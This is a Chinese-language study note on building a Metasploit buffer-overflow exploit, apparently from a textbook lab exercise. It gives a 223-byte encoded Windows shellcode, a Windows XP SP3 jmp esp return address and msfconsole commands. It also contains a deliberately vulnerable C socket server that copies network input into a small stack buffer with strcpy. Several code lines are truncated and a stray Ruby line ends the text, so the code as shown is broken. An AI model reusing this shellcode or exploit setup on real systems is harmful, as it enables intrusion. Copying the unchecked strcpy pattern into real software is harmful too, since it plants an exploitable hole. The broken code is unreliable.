1、利用failwest书中的例子进行测试,执行exploit后提示如下信息,说明 Payload'中的Space过小,增大即可,后面有例子程序可进行测试。
'Payload' =>
{
'Space' => 300,
'BadChars' => "\x00",
'StackAdjustment' => -3500,
},
[-] Exploit failed: No encoders encoded the buffer successfully.
[*] Exploit completed, but no session was created.
2、如提示无法加载模块,说明rb文件书写语法有误,需要更改,不同的版本有可能语法也不完全相同,如下面的rb测试代码放到最新的版本中则无法加载,使用时注意。
3、目前使用metasploit3.4.0版本进行测试,测试时发现targets 中sp2及win 2000地址失效,所以用[ 'Windwos xp sp3', { 'Ret' => 0x7c86467b} ], ,0x7c86467b地址为jmp esp测试成功,使用metasploit console输入 msfpescan -f -j esp c:/windows/system32/kernel32.dll
4、metasploit常用命令:
use 模块名
set payload XX
set rhost XX
set rport XX
set exitfunc seh
set cmd calc
set payload windows/exc
5、配置的shellcode为223个字节,即上面的300可以改为223
/*
* windows/exec - 223 bytes
* http://www.metasploit.com
* Encoder: x86/shikata_ga_nai
* EXITFUNC=process, CMD=calc
*/
unsigned char buf[] =
"\xd9\xe5\xbd\x20\x99\xb8\x99\x31\xc9\xd9\x74\x24\xf4\x5e\xb1"
"\x32\x83\xee\xfc\x31\x6e\x13\x03\x4e\x8a\x5a\x6c\x72\x44\x13"
"\x8f\x8a\x95\x44\x19\x6f\xa4\x56\x7d\xe4\x95\x66\xf5\xa8\x15"
"\x0c\x5b\x58\xad\x60\x74\x6f\x06\xce\xa2\x5e\x97\xfe\x6a\x0c"
"\x5b\x60\x17\x4e\x88\x42\x26\x81\xdd\x83\x6f\xff\x2e\xd1\x38"
"\x74\x9c\xc6\x4d\xc8\x1d\xe6\x81\x47\x1d\x90\xa4\x97\xea\x2a"
"\xa6\xc7\x43\x20\xe0\xff\xe8\x6e\xd1\xfe\x3d\x6d\x2d\x49\x49"
"\x46\xc5\x48\x9b\x96\x26\x7b\xe3\x75\x19\xb4\xee\x84\x5d\x72"
"\x11\xf3\x95\x81\xac\x04\x6e\xf8\x6a\x80\x73\x5a\xf8\x32\x50"
"\x5b\x2d\xa4\x13\x57\x9a\xa2\x7c\x7b\x1d\x66\xf7\x87\x96\x89"
"\xd8\x0e\xec\xad\xfc\x4b\xb6\xcc\xa5\x31\x19\xf0\xb6\x9d\xc6"
"\x54\xbc\x0f\x12\xee\x9f\x45\xe5\x62\x9a\x20\xe5\x7c\xa5\x02"
"\x8e\x4d\x2e\xcd\xc9\x51\xe5\xaa\x26\x18\xa4\x9a\xae\xc5\x3c"
"\x9f\xb2\xf5\xea\xe3\xca\x75\x1f\x9b\x28\x65\x6a\x9e\x75\x21"
"\x86\xd2\xe6\xc4\xa8\x41\x06\xcd\xca\x04\x94\x8d\x0c";
#include
#include
#pragma comment(lib,"ws2_32.lib")
VOID msg_display(char *buf)
{
char msg[200];
strcpy(msg,buf);
cout<<"****************"<
void main()
{
SOCKET sock,msgsock,length,receive_len;
struct sockaddr_in sock_server,sock_client;
char buf[0x200];
WSADATA wsa;
WSAStartup(MAKEWORD(1,1),&wsa);
if ((sock=socket(AF_INET,SOCK_STREAM,0))<0)
{
cout<
}
sock_server.sin_family=AF_INET;
sock_server.sin_port=htons(7777);
sock_server.sin_addr.S_un.S_addr=INADDR_ANY;
if (bind(sock,(sockaddr *)&sock_server,sizeof(sock_server)))
{
cout<<"binging stream socket error!"<
cout<<"**********************************"<
length=sizeof(struct sockaddr);
do
{
msgsock=accept(sock,(struct sockaddr *)&sock_client,(int *)&length);
if (msgsock==1)
{
cout<<"accept error!"<
}
else
do
{
memset(buf,0,sizeof(buf));
if ((receive_len=recv(msgsock,buf,sizeof(buf),0))<0)
{
cout<<"reading stream message error!"<
}
msg_display(buf);
}while(receive_len);
closesocket(msgsock);
} while (1);
WSACleanup();
}
require 'msf/core'